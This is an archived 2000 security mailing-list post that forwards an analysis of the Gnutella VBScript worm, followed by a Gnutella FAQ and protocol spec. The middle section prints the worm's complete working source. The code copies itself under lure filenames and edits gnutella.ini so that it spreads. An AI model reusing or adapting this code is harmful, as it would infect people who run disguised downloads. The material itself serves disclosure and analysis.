[Snort-users] Fwd: kyxspam: gnutella worm

Dragos Ruiu dr at ...50...
Mon Oct 9 04:49:07 EDT 2000


While on the subject.... there are some more proto specs below
for Gnutella and Scour. I think most of you will find this 
one interesting...

cheers,
--dr

----------  Forwarded Message  ----------
Subject: kyxspam: gnutella worm
Date: Sun, 8 Oct 2000 12:54:46 -0700
From: Dragos Ruiu <dr at ...381...>


(Most of the excellent resources here are courtesy 
of the Wired research dept...

I've collated in this message a:
	-Description of the gnutella worm
	-Worm Source code
	-Plain English description/faq of how the Gnutella protocol works
	-The gnutella protocol spec
	-The protocol spec of a similar peer-to-peer system called Scour
	(The napster/OpenNap protocol spec was published a while back
	in kyxspam if you weren't on the list at that time and you want it let
	me know...)

I'm glad to see that credit is given to "crowds" in the FAQ.... this old
anonymyzer proxy system created by some researchers at AT&T 
predates napster and all these other peer-to-peer onion routing 
systems and deserves some credit for the innovation. Though others
may even predate this,  it's the first such system I have on record
from over three years ago....

Look for these sort of peer-to-peer infestations to increase in 
the future....  I'd be surprised if a Napster worm didn't exist yet.

cheers,  
--dr)


url: http://www.gnutty.co.uk/feature/worm/advanced.html

gnutella worm
-----
There have been reports that this new gnutella worm is harmless. This is simply not true. All you have to do is look at a file name on a search, and your computer will blow up. It will burst into flames and bring the whole of gnutellaNet down with it. Only joking :)

 Here's the facts:-
This worm, called Gnutella Worm v1.1, is built in VB Script. VBS runs off the Windows Scripting host which nearly every Windows user has installed. First let's get one thing straight - it doesn't actually do anything to your PC, or any of your important files. And it doesn't do anything unless you download it using gnutella, and then execute it - but I don't think any of you are that stupid.
-----

advanced
OK, so you do a little search on gnutella. What do you find? Amongst all the redundant files, .html porn redirects and other crap, you find a .vbs file of one of these many aliases:-

"Jenna Jameson movie listing.vbs"
 "Pamela Anderson movie listing.vbs"
 "Asia Carerra movie listing.vbs"
"xxx FTP movie listing.vbs"
"ASF Compressor (No quality loss).vbs"
"collegesex.vbs"
"Gladiator.vbs"
"Battlefield Earth.vbs"
"Evangelion complete episodes scripts.vbs"
"Scan Master checklist.vbs"
"How to eat pussy.vbs"
"Alicia Silverstone.vbs"
"Pearl Jam.vbs"
"Mp3 compressor (Half the size but same quality).vbs"
"Napster Metallica Crack.vbs"
"Santana.vbs"
"NSync.vbs"
"Nirvana.mp3.vbs"
"Shania Twain.mp3.vbs"
"Jesus loves you.vbs"
"Gnutella upgrade.vbs"
"OFFICIAL Gnutella Option Pack.vbs"

 Now let me give you a warning: never open .vbs files unless you are sure they are safe. Treat them in the same way as you treat .exe's. VBS can do a lot of damage, and you've got to be careful with them. Why not check them through in Notepad to see if they are life-threatening if you really want to execute it.

 And for all you budding programmers, heres the script. It's in .txt format, so theres no danger of infecting yourself. So go ahead, take a peek.

 You download one of these, and like an excited kid on Christmas Day - you open it. And you are greeted by the sound of chugging from your pc (or is that just from my lump of junk ;) and a window popping up:

 

wtf, you think. You are distracted by this error, so you don't realise that loads of new files have been made in your gnutella directory. This directory is usually C:\Program Files\gnutella\. Let's explain these files:-

#######################################

 Yet another GWV! ('long number').zip
This file is created as well. Dispite it's name, this file isn't a zipped archive. Instead it's a text file that you can safely open in Notepad. This file contains the following:-

 Generation #: (number)
Victim ID: (long number)
Infection date: (date)
If I was a naughty boy, I could use scripting to get name, email, whatever file I want. 

The first number is a generation number. This is the number that increases every time it spreads itself. For example, the generation number is currently 10. You download a .vbs file off me and execute it. As soon as you execute it, the number is changed to 11. Then somebody gets it off you, the number will then be changed to 12, etc.

 The second number is a very long one. This number is unique to you and is used by gnutella to keep track of where to send search requests. The worm does nothing to this number except display it in this file and use it for the file name. 

 The date displayed is the date that the person who you got the file off got infected. The final thing in this file is a little quote..... "If I was a naughty boy, I could use scripting to get name, email, whatever file I want." Hmm...I'm no expert at VBS but I don't think thats possible (appart from the "whatever file I want bit" - which is possible), so don't worry about it.

 gnutella.ini
You'll also notice that your gnutella.ini file has been edited. The additions made are:-

databasepath=....... - These are the directorys that gnutella shares with the world seperated by a ";". GW adds the directory which contains the .vbs files to any directorys already defined in here. This is usually C:\Program Files\gnutella.

 extlist=..... - These are the file types you would like to share with the world sepertaed by a ";". These are usually things like mp3,avi and zip. GW adds "vbs;" to this list.

 These 2 additions to the gnutella.ini file are made so that the worm can spread itself. How? Well first it has to point gnutella to the place where your now multiple .vbs files are kept. This is usually C:\Program Files\gnutella. Then it has to make it available to people who search your list of files. It does this by adding vbs to the exstenion list. Simple. Too simple.

 But theres a little bug in this worm that adds both "C:\Program Files\gnutella\;" and "vbs;" loads of times. This is a mistake by the author, but it doesn't stop either the worm or gnutella from functioning properly.

 various file names.vbs
These files are nearly identical to the one you executed in the first place appart from a few minor changes. First, and most obvious, is the file name. This file name may be any (or there may be different ones now) of the names on the list above. These files names are randomly generated by the array within the script, which makes catching the virus even easier (and harder to stop!). These file names are aimed at getting as many people as possible download it, but i don't see many people searching for "Evangelion complete episodes scripts";)

 The second change is similar to the last one, expect it is contained within the script itself. It is the "CurrentFilename" variable. This is changed to reflect the filename of the current file.

 Change 3 is the "CurrentGeneration" variable. This is the number that keeps track of how many people are caught by the bug. Each time somebody executes the script, 1 is added to this value when the new files are created.

 The final change is the "InfectionDate". This is changed so that the first defintion is the time/date you got infected, and the second definition is the time/date the person before you got infected. This changes everytime somebody is infected.

 #######################################

 Finally, after leaving you several presents the worm deletes itself. You then forget all about it, but it's still there - in your gnutella directory. Other people do a search for something as innocent as "Jesus loves you" and they stumble accross your file. They download it off you, execute it and then they forget about it. That's how it spreads....but you can get rid of it very easily - so other people dont have to suffer with it.

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(and the worm code... --dr)

url: http://www.gnutty.co.uk/feature/worm/gw.txt

Option Explicit
Dim CurrentFilename, CurrentGeneration, InfectionDate
CurrentFilename = "OFFICIAL Gnutella Option Pack.vbs"
CurrentGeneration = 12
InfectionDate = "5/31/2000, 10:17:03 AM"


'
const ProgramName = "Gnutella Worm v1.1"
const ProgramDate = "2000 May 21. I think that's the first Gnutella Worm."
'
'
' Watching CurrentGeneration will be quite interesting. I wonder if
' anyone ever studied this compared with real viral spreading.
'
' 42
'
' History
'
'  1.1  o Now copies itself to a list of target keyword instead of just current filename
'       o Fixed a but with Ini path... (1.0 didn't work at all. he he.)
'
'  1.0  o Initial Release
'

' Behavior Control Parameters
Dim NewFilenames, GnutellaPath, GnutellaIni, VictimFilename
NewFilenames    = Array(ProgramName & ".vbs", "Jenna Jameson movie listing.vbs", "Pamela Anderson movie listing.vbs", "Asia Carerra movie listing.vbs", "xxx FTP movie listing.vbs", "ASF Compressor (No quality loss).vbs", "collegesex.vbs", "Gladiator.vbs", "Battlefield Earth.vbs", "Evangelion complete episodes scripts.vbs", "Scan Master checklist.vbs", "How to eat pussy.vbs", "Alicia Silverstone.vbs", "Pearl Jam.vbs", "Mp3 compressor (Half the size but same quality).vbs", "Napster Metallica Crack.vbs", "Santana.vbs", "NSync.vbs", "Nirvana.mp3.vbs", "Shania Twain.mp3.vbs", "Jesus loves you.vbs", "Gnutella upgrade.vbs", "OFFICIAL Gnutella Option Pack.vbs")
GnutellaPath    = "C:\Program Files\gnutella\"
GnutellaIni     = GnutellaPath + "gnutella.ini"
VictimFilename  = "Yet another GWV! "                   ' (Gnutella Worm Victim :)


Const ForReading = 1
Const ForWriting = 2


Dim fso
Dim SourceFile, DestinationFile
Dim NewFilename
Dim VictimName

Function ModifyAndCopy
  ' Change Header data (New name, Generation number, any info passed down to the next Generation)

  DestinationFile.WriteLine(SourceFile.ReadLine)
  DestinationFile.WriteLine(SourceFile.ReadLine)

  DestinationFile.WriteLine("CurrentFilename = """ & NewFilename & """")

  DestinationFile.WriteLine("CurrentGeneration = " & (CurrentGeneration + 1))

  DestinationFile.WriteLine("InfectionDate = """ & Date & ", " & Time & """")

  SourceFile.ReadLine ' Skip the ones we just wrote changed.
  SourceFile.Readline
  SourceFile.Readline


  ' Copy the rest of the file as-is
  Do While Not SourceFile.AtEndOfStream
    DestinationFile.WriteLine(SourceFile.ReadLine)
  Loop
End Function

Function ProcessIni
  Dim IniFile, IniFileDest
  Dim Line

  Set IniFile = fso.OpenTextFile(GnutellaIni, ForReading)
  Set IniFileDest = fso.CreateTextFile(GnutellaIni + "_", ForWriting)

  Do While Not IniFile.AtEndOfStream
    Line = IniFile.ReadLine

    if Left(Line, 8) = "extlist=" Then
      IniFileDest.WriteLine(Line + ";vbs")
    ElseIf Left(Line, 13) = "databasepath=" Then
      IniFileDest.WriteLine(Line + ";" + GnutellaPath)
    ElseIf Left(Line, 12) = "clientid128=" Then
      VictimName = Mid(Line, 13)
      IniFileDest.WriteLine(Line)
    Else
      IniFileDest.WriteLine(Line)
    End If
  Loop

  IniFileDest.Close
  IniFile.Close

  fso.DeleteFile(GnutellaIni)
  fso.MoveFile GnutellaIni + "_", GnutellaIni

End Function

Function SignalVictim
  Dim Victim
  Dim Line
  Dim SignatureFilename
  
  SignatureFilename = GnutellaPath & VictimFilename & VictimName & ".zip"

  Set Victim = fso.CreateTextFile(SignatureFilename, ForWriting)

  Victim.WriteLine("Generation #: " & CurrentGeneration)
  Victim.WriteLine("Victim ID: " & VictimName)
  Victim.WriteLine("Infection date: " & InfectionDate)
  
  Victim.WriteLine("If I was a naughty boy, I could use scripting to get name, email, whatever file I want.")

  Victim.Close
End Function

Set fso = CreateObject("Scripting.FileSystemObject")


If fso.FolderExists(GnutellaPath) Then
  For Each NewFilename in NewFilenames

    Set DestinationFile = fso.CreateTextFile(GnutellaPath + NewFilename, True)
    Set SourceFile = fso.OpenTextFile(CurrentFilename, ForReading)

    ModifyAndCopy
    ProcessIni
    SignalVictim

    SourceFile.Close
    DestinationFile.Close
  Next

End If

fso.DeleteFile(CurrentFilename)

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(a good overview of how the protocol works....   --dr)

url: http://www.rixsoft.com/Knowbuddy/gnutellafaq.html


Knowbuddy's Gnutella FAQ

I don't claim that this FAQ is all-inclusive, just that it contains a written record of some of my thoughts on the subject. No, I haven't even started writing my own client. I'm more of a ... consultant ... at this phase. This FAQ is very much a work in progress, so please let me know if you know of anything that you feel I should address. You can find me on EFnet IRC in #gnutelladev, or email me at gnutelladev at ...612... The latest version of this document should always be found at <http://www.rixsoft.com/Knowbuddy/gnutellafaq.html>.

Contents


Resources 

Gnutella 

Online Privacy & Anonymity 

A Brief Overview of the Protocol 

Terminology 

Connecting 

Searching 

Downloading 

TTL (Time To Live) 

Differences from Napster 

Similarities with Napster 

Servent-to-Servent Communication 

The Packet Header 

Functions 

Packet Routing 

An Important Note on Anonymity and Tracking 

Known Issues with the Protocol 

Search Query Spoofing 

Search Result Spoofing 

Protocol Enhancement Ideas 

Authentication and Trust 

Using UDP 

A Gnutella Proxy Server 

Notes

Resources

Gnutella


http://gnutella.nerdherd.net/ 

http://capnbry.dyndns.org/gnutella/protocol.html

Online Privacy & Anonymity


Flood Control on the Information Ocean: Living With Anonymity, Digital Cash, and Distributed Databases 

Crowds
"Crowds is a system for protecting your privacy while you browse the web." 

Freedom
Zero Knowledge Systems
"Freedom combines online pseudonyms, powerful cryptography, and network technology to give you the best in personal Internet security."

A Brief Overview of the Protocol

Terminology

Most of the Internet works on a client-server basis. You, as the client, connect your machine to a server, which is normally bigger and faster than you, and you retrieve information (as files). The server rarely gets any files from you. The gnutella protocol is a bit different in that clients become servers and servers become clients all at once. The playing field is levelled and anyone can be a client or a server, no matter how big or fast they are. Since you can be both, the combination has become known as a "servent". However, to avoid confusion, I'll try to stick with the standard definitions of client and server whenever possible, to create a context.

This is accomplished by creating a sort of distributed environment. You act as a server to people who want the files on your machine, and you act as a client to access files on other people's machines. Of course, you can be just a server (by never bothering to retrieve any other files) or just a client (by not sharing any of your files), but in the spirit of openness and cooperation, you will probably end up doing a little of both. The gnutella network is made up of hundreds (eventually many thousands) of servents all chattering away at each other and sending files back and forth.

All communication is done over the TCP/IP protocol. Each piece of information is called a "packet", just like in Internet terms. More often than not, the gnutella packets coincide nicely with TCP/IP packets. Right now, the protocol uses TCP/IP only; no UDP.

Connecting

To connect to the network, you only have to know one thing: the IP address and port of any servent that is already connected. The first thing your servent does when it connects is announce your presence. The servent you are connected to passes this message on to all of the servents it is already connected to, and so on until the message propagates throughout the entire network.[1] Each of these servents then responds to this message with a bit of information about itself: how many files it is sharing, how many KBs of space they take up, etc. So, in connecting, you immediately know how much is available on the network to search through.

Searching

Searching works similarly to connecting: you send out a search request, it is propagated through the network, and each servent that has matching terms passes back its result set. Each servent handles the search query in its own way. The simple query ".mp3" could be handled in different ways by different servents: one servent might take it literally, matching anything with ".mp3" in it, while another might interpret it as a regular expression and match any character followed by "mp3". To save on bandwidth, a servent does not have to respond to a query if it has no matching items. The servent also has the option of returning only a limited result set, so that it doesn't have to return 5000 matches when someone searches for "mp3".

Since all of the searches are to the local servent's database, the servent sees what everyone else is searching for. Using this, most clients have a Search Monitor that allows the user to see, in real time, the searches that their servent is responding to.

Downloading

For file sharing, each servent acts as a miniature HTTP web server. Since the HTTP protocol is well established, existing code libraries can be used. When you find a search result that you want to download, you just connect to the servent in the same way your web browser would connect to a web server, and you are good to go. Of course, the servent has this built-in, so your normal web browser never has to enter the picture.

Servents are also smart enough to compensate for firewalls. If you are behind a firewall that can only connect to the outside world on certain ports (80, for instance) you will just need to find a servent running on port 80. Since the servents can serve on any port, you are likely going to find one that is serving on a firewall-friendly port. Also, if you are trying to download a file from a servent that is behind a firewall, you can ask the firewalled servent to push the file to you since you will not be able to connect to it directly. The only thing the protocol cannot compensate for is file transfers between two servents behind two different firewalls. In such a case, there really isn't anything that can be done.

TTL (Time To Live)

Just like TCP/IP packets, gnutella packets have a TTL (Time To Live). The TTL starts off at some low number, like 5. Each time a packet is routed through a servent, the servent lowers the TTL by 1. Once the TTL hits 0 the packet is no longer forwarded. This helps to keep packets from circling the network forever. Also, each servent has the option to arbitrarily lower the TTL of a packet if it thinks it is unreasonable. So, even if I send all my packets with a TTL of 200, the odds are that most of the servents along the way are going to just immediately knock this down to a more reasonable number. The number of servents the packet has already been routed through is also noted, and acts as a sort of reverse-TTL.

Differences from Napster

A Napster network is closer to the traditional client-server motif. A client connects to one prebuilt Napster server and no one else. All queries are routed through this central server and it is the server that does the searching and returns the result set. The server still does not host the files, though. Once you have picked out a file you want, file transfer works similar to the gnutella method.

The up-side of this is that there are many redundant servers and they are all in fixed locations, so you will always be able to connect to a Napster server somewhere. Also, the dedicated hardware for the searches is normally pretty fast and optimized, and you get your results all at once. The search language is also controlled, so you know that each server is going to treat search terms similarly. (With badly-written gnutella clones you have the possibility of "*.mp3" not actually matching anything because it doesn't support globbing.)

The down side is that the central server don't talk to each other. This means that each Napster network is a wholly separate entity, which severely limits your search options. Several of the Napster clones allow you to choose which network you want to join, but the average user still has a hit-or-miss chance of finding the same user on the same network twice. Also, if the central server is bogged down, searches can take inordinate amounts of time.

Similarities with Napster

Both Napster and Gnutella allow you to control what files you share. Gnutella takes this a bit further than Napster by also allowing you to share different types of files, but the basic principles are the same.

Servent-to-Servent Communication


For the following examples, I am going to use the old cryptographic examples of Alice, Bob, and Eve. I'll also throw in Charlie, who will always be between Alice and Bob, and is essentially Alice's link to the outside world. Eve is the bad hax0r script-kiddie, bent on bringing down the network. Let us say that Alice is behind a firewall, connected only to Charlie, who is then also connected to Bob. Eve is going to move around a bit, so we'll leave her floating in limbo. Refer to Figure 001.

The Packet Header

All of the packets traveling around the network have a 23-byte header that consists of the following information: 

1. 
MessageID, 16 bytes - A unique identifier used for tracking this specific packet. It should be unique to the network, which is to say that two servents may not generate the same MessageID (within a reasonable amount of time), and one servent should never use the same MessageID more than once. 
2. 
FunctionID, 1 byte - The underlying point of the message. Labels the packet as a search, or a connection announcement (initialization), etc. 
3. 
RemainingTTL, 1 byte - The TTL left to this packet. The originating servent sets this and each servent the packet is routed through decrements it. See TTL. 
4. 
HopsTaken, 1 byte - The number of servents this packet has already been routed through. This starts at 0 and is incremented by each servent. 
5. 
DataLength, 4 bytes - The size of the remaining data in the packet. Included so that the processing servent will know when the incoming packet ends.

Incidentally, since each connection is a unique combination of host and port, we'll track these later on using the pseudo-key ConnectionID.

Functions

The FunctionID field of the packet header tells the servent how to process the request. Valid requests are the INITialization (0x00), Search (0x80), and Client-Push Request (0x40). INITialization and Search both have responses, which set the low bit, making their values 0x01 and 0x81, respectively. A response to a Client-Push Request isn't necessary, as the receiving servent would either then push the file or not push the file to the sender. For more information on the layout of the packets for the individual functions, see the excellent documentation at <http://capnbry.dyndns.org/gnutella/protocol.html>.

Packet Routing

We'll start off with an INITialization packet, as that is how you announce your presence, and searches work in essentially the same way. When Alice connects to Charlie, she sends her INIT packet. Charlie receives it, and routes it on to Bob and Eve. At the same time, he sends back to Alice an INIT Response that tells Alice what his host IP and port are (even though Alice already knows this), how many files he is sharing, and how much space those files take up. When Bob and Eve get the routed INIT packet from Charlie, they send their own INIT Responses back to Charlie, who then forwards them back to Alice. Incidentally, Bob and Eve both forward the INIT packet on to everyone they are connected to, and so on, until the packet expires. In this way, Alice now has information about everyone her packets can reach before they expire.

The trick here is that Charlie needs to keep track of some of the messages that come his way. For this, he needs a good Routing Table. A routing table is a list of the last few hundred packets you have received, who sent them, and what they did. In this case, Charlie needs to keep track of the MessageID for the INIT packet that Alice sent, so when he gets replies from Bob and Eve he will know that they are supposed to go to Alice, and not some other person he is connected to. A really good routing table is indexed by MessageID, FunctionID, and ConnectionID, for fast lookup and just in case different clients use the same MessageID.

This is also useful because Charlie is eventually going to get the original INIT packet back from Eve, because Eve has no way of knowing that Charlie has already seen it. This isn't a problem as Charlie just looks in his Routing Table, notes that he has already processed this request, and simply drops the packet. The bigger the Routing Table, the less chance there is for propagating duplicate packets.

Also, Charlie doesn't want to keep all of the packets he has seen, just enough. So, Charlie will most likely also have a Most Recently Processed rotating pool. Basically, Charlie keeps track of the last time he got a duplicate for a fixed number of packets, 500 for example. Whenever he gets a new packet, he takes the oldest one from his MRP pool, deletes the corresponding entry from his Routing Table, and replaces both of them with the new packet. In this way, his Routing Table stays a fixed size so it doesn't eat up memory, but he's also limiting the chance of propagating duplicate packets.

Searching works on essentially the same concept: Alice to Charlie to Bob and Eve and then back again. However, obviously some additional information is passed back, such as the connection information of the hosting servent, and an array of results in a result set.

An Important Note on Anonymity and Tracking

There is one thing to note which will come into play much more later as we discuss security and spoofing: Bob cannot reliably tell whether the packets are originating from Alice or Charlie. The HopsTaken field of the header should let him know if it was Charlie (as it would be 0), but beyond that he cannot be sure, as he cannot know who else is connected to Charlie. There is also the possibility that Charlie is sending incorrect information in that field, so it really cannot be used to trace a packet back to its owner. Due to this, each servent only reliably knows about the servents it is directly connected to. Anyone else is a mystery. This is not a bug, it is a feature. In this way, Eve cannot correlate searches with any specific user or prosecute them for doing things that she considers wrong.

Known Issues with the Protocol

Search Query Spoofing

Eve's current favorite trick is to flood the network with so many search requests as to make it unuseable by slower users. Since a search packet cannot be traced back to a specific sender, there currently is no reliable method of blocking such an attack. One suggestion was to disconnect hosts that suddenly start forwarding on large numbers of search requests. This has the possibility of simply disconnecting fast users, but it's the only viable solution at this time. Imeplementation of this is going to be tricky, though, as "too fast" is going to be different for every client.

Another idea is to allow the user to tell the servent which search results are bogus. Once the servent has collected enough verifiably bogus packets from one other servent, it can disconnect from that servent. If Charlie tells his servent that enough bogus packets are coming from Eve's direction, then the servent can just assume Eve to be hostile and refuse to connect to her. Packets may still reach Charlie via other routes (through Bob), but if enough servents deny a host, eventually that host will be unable to connect to anyone. To prevent Eve from simply switching to another port, a "Ban this IP" option would probably be the way to go.

Search Result Spoofing

This is a bit harder to deal with, as an intermediary servent (Charlie) has no way of knowing that the result packets it is routing (from Eve) contain bogus data. Only when Alice connects to Eve to retrieve the file will she know that the result was spoofed. Also, there is the possibility that Eve may be returning valid file pointers, but the files aren't what she says they are, and may contain viruses, etc. Again, an adaptive system on Alice's end such that Alice's servent eventually just refuses to see anything from Eve may be the answer to this.

Protocol Enhancement Ideas

These are just some ideas that I have come up with or have been mentioned on the mailing list or IRC. They are not, by any means, in any form of implementation, they are just ideas.

Authentication and Trust

If we extend the adaptive banning system that we are using to combat search spoofing such that we allow Charlie to tell Bob that he is banning Eve, then we begin to form a trust network. If Bob trusts Charlie, he may opt to put Eve "on probation" and watch her more closely. Or, he may simply trust Charlie implicitly and immediate ban Eve, or not trust Charlie at all and simply ignore him. Currently the protocol does not support sharing trust or banning information, but it could be worked in. Even if we don't want to extend the protocol to add a specific function for this, we could do it with specialized search packets that Bob and Charlie know not to route.

Additionally, we may choose to integrate some sort of authntication protocol such that Charlie knows that Alice is indeed Alice. One person in the channel suggested PGP-style keys and another mentioned Kerberos.

Using UDP

One of the most-often asked questions is why TCP/IP is used instead of UDP. One problem with using UDP is its connectionless nature. Charlie knows that Alice and Bob are there because their connections are still up. If Charlie used UDP, he'd have a tougher time telling when Alice or Bob disconnected abruptly from the network, and would probably waste bandwidth sending at Alice and Bob when they aren't actually there. Connection build time is the argument most heard from UDP proponents, but this isn't really an issue. Since the servents stay in constant contact with each other and aren't just dropping and creating connections on the fly (normally), the overhead for connection building is minimal.

A Gnutella Proxy Server

This was first brought up on the mailing list, and then in the channel. The following is a combination of ideas by myself, Watts, and Luis Muniz.

One of the things we've been tossing around on both the list and the channel is the idea of a gnutella proxy server or gateway. We've figured out a way to do it without having to break the protocol, so theoretically, someone could implement one immediately. A couple different design goals motivated us:


The Eve-types have been flooding the network with bogus searches and other flotsam. While the larger-bandwidth clients can handle this, it makes modem users essentially dead in the water. 

We want the ability to have a private local network that sees the outside world, but it not seen by it. A sort of gnutella firewall. 

There is the remote chance that corporations might allow gnutella if they have some control over what can be retrieved (ie, only PowerPoint presentations). A proxy system would allow for this.

We'll continue with the above diagram in which Alice is the private local network user, Charlie is the proxy servent, and Bob and Eve are users on the rest of the public network. Since we do not have to break the protocol to implement such a beast, there are varying levels of proxying that can be brought about.

First, when Alice connects to Charlie, Charlie immediately does a *.*-type search to get Alice's shared files list. From then on, Charlie treats Alice's shared files as his own. When Bob performs a search that matches one of Alice's files, Charlie spoofs a return packet that points to the file on Alice's machine. The search request never even reaches Alice, but Alice's files are searched. Then, when Alice does a search that matches a file of Bob's, Charlie has been keeping track of Alice's searches and allows that response to pass back to Alice. In this way, Alice doesn't see any of the other network traffic, just the packets pertinent to her. Of course, if Alice doesn't want to share her files with anyone on the outside, she can simply not return any files to Charlie.

If we assume that Alice only wants to connect to proxying servents like Charlie, and that Charlie is working together with these other proxy servents, then we have a way for Alice to stay behind a proxy. Upon receiving Alice's INIT packet, Charlie does not pass it on to the rest of the network, but spoofs return packets for the other proxy servers he is working with. In this way, Alice's host catcher is only populated with other proxy servers and the outside network does not even have to know that Alice exists.

If we want to add another level of complexity, such that Alice's files are not directly pointed to by Charlie's spoofed search return packets, then we can have Charlie act as a gateway for Alice and Bob. Bob does a search that matches one of Alice's files. Charlie spoofs the search response to look like he is holding the file. When Bob requests the file, Charlie simultaneously requests the file from Alice and simply shovels the data in one port and out the other. Requests from Alice to Bob work in the same manner. Alice and Bob never even have to know about each other.

This also allows Alice, who can only connect to Charlie because of her firewall, to get files from Bob. Of course, this doesn't stop Eve from spoofing search results or substituting trojans, but it does keep Eve's knowledge of Alice very limited. Also, what you then essentially have is a Napster network in which the servers/servents talk to each other.

Of course, if Alice is able to connect to other non-proxy servents outside of her private network then she certainly could still do so. However, it is in her best interests, for bandwidth reasons and anonymity, to only connect to one proxy server at a time and no one else.

--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(and the protocl spec....  --dr)

url: http://gnutelladev.wego.com/go/wego.pages.page?groupId=139406&view=page&folderId=145203&pageId=145249

PROTOCOL
Gnutella/0.4 protocol

  
The Gnutella protocol

Last update: 15 April 2000

Updated PUSH request routing instructions. Please comment. gene at ...613...



Notes
Everything is in network byte order unless otherwise noted. Byte order of the GUID is not important. 

Apparently, there is some confusion as to what "\r" and "\n" are. Well, \r is carriage return, or 0x0d, and \n is newline, or 0x0a. This is standard ASCII, but there it is, from "man ascii".

Keep in mind that every message you send can be replied by multiple hosts. Hence, Ping is used to discover hosts, as the Pong (Ping reply) contains host information.

Throughout this document, the term server and client is interchangeable. Gnutella clients are Gnutella servers.

Thanks to capnbry for his efforts in decoding the protocol and posting it.

How GnutellaNet works
General description

GnutellaNet works by "viral propagation". I send a message to you, and you send it to all clients connected to you. That way, I only need to know about you to know about the entire rest of the network.

A simple glance at this message delivery mechanism will tell you that it generates inordinate amounts of traffic. Take for example the defaults for Gnutella 0.54. It defaults to maintaining 25 active connections with a TTL (TTL means Time To Live, or the number of times a message can be passed on before it "dies"). In the worst of worlds, this means 25^7, or 6103515625 (6 billion) messages resulting from just one message!

Well, okay. In truth it isn't that bad. In reality, there are less than two thousand Gnutella clients on the GnutellaNet at any one time. That means that long before the TTL expires on our hypothetical message, every client on the GnutellaNet will have seen our message.

Obviously, once a client sees a message, it's unnecessary for it to process the message again. The original Gnutella designers, in recognition of this, engineered each message to contain a GUID (Globally Unique Identifier) which allows Gnutella clients to uniquely identify each message on the network.

So how do Gnutella clients take advantage of the GUID? Each Gnutella client maintains a short memory of the GUIDs it has seen. For example, I will remember each message I have received. I forward each message I receive as appropriate, unless I have already seen the message. If I have seen the message, that means I have already forwarded it, so everyone I forwarded it to has already seen it, and so on. So I just forget about the duplicate and save everyone the trouble. 

Topology

The GnutellaNet has no hierarchy. Every server is equal. Every server is also a client. So everyone contributes. Well, as in all egalitarian systems, some servers are more equal than others. Servers running on fast connections can support more traffic. They become a hub for others, and therefore get their requests answered much more quickly. Servers on slow connections are relegated to the backwaters of the GnutellaNet, and get search results much more slowly. And if they pretend to be fast, they get flooded to death.

But there's more to it than that.

Each Gnutella server only knows about the servers that it is directly connected to. All other servers are invisible, unless they announce themselves by answering to a PING or by replying to a QUERY. This provides amazing anonymity.

Unfortunately, the combination of having no hierarchy and the lack of a definitive source for a server list means that the network is not easily described. It is not a tree (since there is no hierarchy) and it is cyclic. Being cyclic means there is a lot of needless network traffic. Clients today do not do much to reduce the traffic, but for the GnutellaNet to scale, developers will need to start thinking about that.

Connecting to a server
After making the initial connection to the server, you must handshake. Currently, the handshake is very simple. The connecting client says:

GNUTELLA CONNECT/0.4\n\n

The accepting server responds:

GNUTELLA OK\n\n

After that, it's all data.

Downloading from a server
Downloading files from a server is extremely easy. It's HTTP. The downloading client requests the file in the normal way:

GET /get/1234/strawberry-rhubarb-pies.rcp HTTP/1.0\r\n
Connection: Keep-Alive\r\n
Range: bytes=0-\r\n
\r\n

As you can see, Gnutella supports the range parameter for resuming partial downloads. The 1234 is the file index (see HITS section, below), and "strawberry-rhubarb-pies.rcp" is the filename.

The server will respond with normal HTTP headers. For example: 

HTTP 200 OK\r\n
Server: Gnutella\r\n
Content-type:application/binary\r\n
Content-length: 948\r\n
\r\n

The important bit is the "Content-Length" header. That tells you how much data to expect. After you get your fill, close the socket.

Header
bytes
summary
description
0-15
Message identifier
This is a Windows GUID. I'm not really sure how globally-unique this has to be. It is used to determine if a particular message has already been seen.
16
Payload descriptor (function identifier)
Value
Function
0x00
Ping
0x01
Pong (Ping reply)
0x40
Push request
0x80
Query
0x81
Query hits (Query reply)
17
TTL
Time to live. Each time a message is forwarded its TTL is decremented by one. If a message is received with TTL less than one (1), it should not be forwarded.
18
Hops
Number of times this message has been forwarded.
19-22
Payload length
The length of the ensuing payload.

Payload: ping (function 0x00)
No payload
Routing instructions
Forward PING packets to all connected clients. Most other documents state that you should not forward packets to their originators. I think that's a good optimization, but not a real requirement. A server should be smart enough to know not to forward a packet that it originated.

A cursory analysis of GnutellaNet traffic shows that PING comprises roughly 50% of the network traffic. Clearly, this needs to be optimized. One of the problems with clients today is that they seem to PING the network periodically. That is indeed necessary, but the frequency of these "update" PINGs can be drastically reduced. Simply watching the PONG messages that your client routes is enough to capture lots of hosts.

One possible way to really reduce the number of PINGs is to alter the protocol to support PING messages which includes PONG data. That way you need only wait for hosts to announce themselves, rather than discovering them yourself.

Payload: pong (query reply) (function 0x01)
bytes
summary
description
0-1
Port
IPv4 port number.
2-5
IP address
IPv4 address. x86 byte order! Little endian!
6-9
Number of files
Number of files the host is sharing.
10-13
Number of kilobytes
Number of kilobytes the host is sharing.
Routing instructions
Like all replies, PONG packets are "routed". In other words, you need to forward this packet only back down the path its PING came from. If you didn't see its PING, then you have an interesting situation that should never arise. Why? If you didn't see the PING that corresponds with this PONG, then the server sending this PONG routed it incorrectly.

Payload: query (function 0x80)
bytes
summary
description
0-1
Minimum speed
The minimum speed, in kilobytes/sec, of hosts which should reply to this request.
2+
Search criteria
Search keywords or other criteria. NULL terminated.
Routing instructions
Forward QUERY messages to all connected servers.

Payload: query hits (query reply) (function 0x81)
bytes
summary
description
0
Number of hits (N)
The number of hits in this set. See "Result set" below.
1-2
Port
IPv4 port number.
3-6
IP address
IPv4 address. x86 byte order! Little endian!
7-10
Speed
Speed, in kilobits/sec, of the responding host.
11+
Result set
There are N of these (see "Number of hits" above). 

bytes
summary
description
0-3
Index
Index number of file.
4-7
Size
Size of file in bytes.
8+
File name
Name of file. Terminated by double-NULL.
Last 16 bytes
Client identifier
GUID of the responding host. Used in PUSH.
Routing instructions
HITS are routed. Send these messages back on their inbound path.

Payload: push request (function 0x40)
bytes
summary
description
0-15
Client identifier
GUID of the host which should push.
16-19
Index
Index number of file (given in query hit).
20-23
IP address
IPv4 address to push to.
24-25
Port
IPv4 port number to push to.
Routing instructions
Forward PUSH messages only along the path on which the query hit was delivered. If you missed the query hit then drop the packet, since you are not instrumental in the delivery of the PUSH request.


--kyx----kyx----kyx----kyx----kyx----kyx----kyx----kyx--
(and the specs for a similar peer-peer system.  --dr)

